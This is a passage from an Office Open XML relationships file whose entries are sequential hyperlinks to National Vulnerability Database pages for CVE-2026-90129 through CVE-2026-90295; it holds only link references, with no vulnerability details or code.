Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90129" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90130" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90131" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90132" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90133" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90134" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90135" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90136" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90137" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90138" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90139" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90140" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90141" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90142" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90143" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90144" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90145" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90146" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90147" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90148" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90149" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90150" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90151" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90152" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90153" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90154" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90155" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90156" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90157" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90158" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90159" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90160" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90161" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90162" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90163" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90164" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90165" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90166" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90167" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90168" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90169" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90170" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90171" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90172" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90173" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90174" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90175" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90176" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90177" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90178" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90179" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90180" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90181" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90182" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90183" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90184" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90185" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90186" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90187" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90188" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90189" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90190" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90191" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90192" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90193" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90194" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90195" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90196" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90197" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90198" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90199" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90200" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90201" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90202" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90203" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90204" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90205" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90206" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90207" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90208" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90209" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90210" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90211" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90212" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90213" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90214" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90215" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90216" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90217" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90218" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90219" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90220" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90221" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90222" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90223" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90224" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90225" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90226" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90227" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90228" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90229" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90230" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90231" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90232" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90233" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90234" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90235" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90236" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90237" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90238" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90239" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90240" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90241" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90242" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90243" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90244" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90245" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90246" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90247" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90248" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90249" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90250" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90251" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90252" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90253" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90254" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90255" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90256" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90257" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90258" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90259" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90260" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90261" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90262" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90263" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90264" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90265" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90266" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90267" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90268" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90269" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90270" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90271" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90272" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90273" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90274" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90275" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90276" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90277" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90278" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90279" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90280" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90281" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90282" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90283" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90284" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90285" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90286" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90287" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90288" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90289" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90290" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90291" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90292" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90293" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90294" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90295" TargetMode="External" Id="rId662" /><Relationship 